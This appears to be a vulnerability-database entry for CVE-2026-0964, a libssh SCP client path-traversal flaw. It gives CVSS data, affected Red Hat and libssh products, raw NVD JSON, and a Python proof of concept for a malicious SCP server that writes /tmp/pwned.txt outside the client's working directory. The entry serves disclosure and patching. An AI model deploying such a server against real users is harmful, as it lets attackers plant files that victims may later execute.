Security Vulnerability Report
CVE-2026-0964 CVSS 6.3 MEDIUM

CVE-2026-0964

Published: 2026-03-26 21:17:00
Last Modified: 2026-05-19 14:16:32

Description

A malicious SCP server can send unexpected paths that could make the client application override local files outside of working directory. This could be misused to create malicious executable or configuration files and make the user execute them under specific consequences. This is the same issue as in OpenSSH, tracked as CVE-2019-6111.

CVSS Details

CVSS Score: 6.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:libssh:libssh:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:hardened_images:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:openshift_container_platform:4.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:* - VULNERABLE
libssh < 0.11.4
libssh < 0.12.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket
import threading

# Simple PoC to simulate a malicious SCP server exploiting CVE-2026-0964
# It sends a malicious path to overwrite a file outside the working directory.

def handle_client(client_socket):
    try:
        # Initial SCP protocol interaction (simplified)
        client_socket.send(b"\x00")  # Sink stream

        # Send command to write to a file outside CWD (e.g., /tmp/pwned.txt)
        # C0644 indicates permissions and size, followed by the path
        malicious_path = b"/tmp/pwned.txt"
        command = b"C0644 10 " + malicious_path + b"\n"
        client_socket.send(command)

        # Send file content
        client_socket.send(b"VULNERABLE")

        # End of file
        client_socket.send(b"\x00")
    except Exception as e:
        print(f"Error: {e}")
    finally:
        client_socket.close()

def start_server(host='0.0.0.0', port=22):
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((host, port))
    server.listen(5)
    print(f"[+] Malicious SCP server listening on {port}...")
    while True:
        client, addr = server.accept()
        print(f"[+] Connection from {addr}")
        client_handler = threading.Thread(target=handle_client, args=(client,))
        client_handler.start()

if __name__ == "__main__":
    start_server()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0964", "sourceIdentifier": "[email protected]", "published": "2026-03-26T21:17:00.393", "lastModified": "2026-05-19T14:16:32.177", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A malicious SCP server can send unexpected paths that could make the\nclient application override local files outside of working directory.\nThis could be misused to create malicious executable or configuration\nfiles and make the user execute them under specific consequences.\n\nThis is the same issue as in OpenSSH, tracked as CVE-2019-6111."}, {"lang": "es", "value": "Un servidor SCP malicioso puede enviar rutas inesperadas que podrían hacer que la aplicación cliente sobrescriba archivos locales fuera del directorio de trabajo. Esto podría ser mal utilizado para crear archivos ejecutables o de configuración maliciosos y hacer que el usuario los ejecute bajo consecuencias específicas.\n\nEste es el mismo problema que en OpenSSH, rastreado como CVE-2019-6111."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 3.4}]}, 
"weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libssh:libssh:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.11.4", "matchCriteriaId": "68C64024-6979-46E1-A57F-5C0228DC8DAD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:hardened_images:-:*:*:*:*:*:*:*", "matchCriteriaId": "87DEB507-5B64-47D7-9A50-3B87FD1E571F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:openshift_container_platform:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "932D137F-528B-4526-9A89-CD59FA1AB0FE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "D65C2163-CFC2-4ABB-8F4E-CB09CEBD006C"}]}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:18160", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:18683", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-0964", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436979", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.libssh.org/2026/02/10/libssh-0-12-0-and-0-11-4-security-releases/", "source": "[email protected]", "tags": ["Release Notes"]}]}}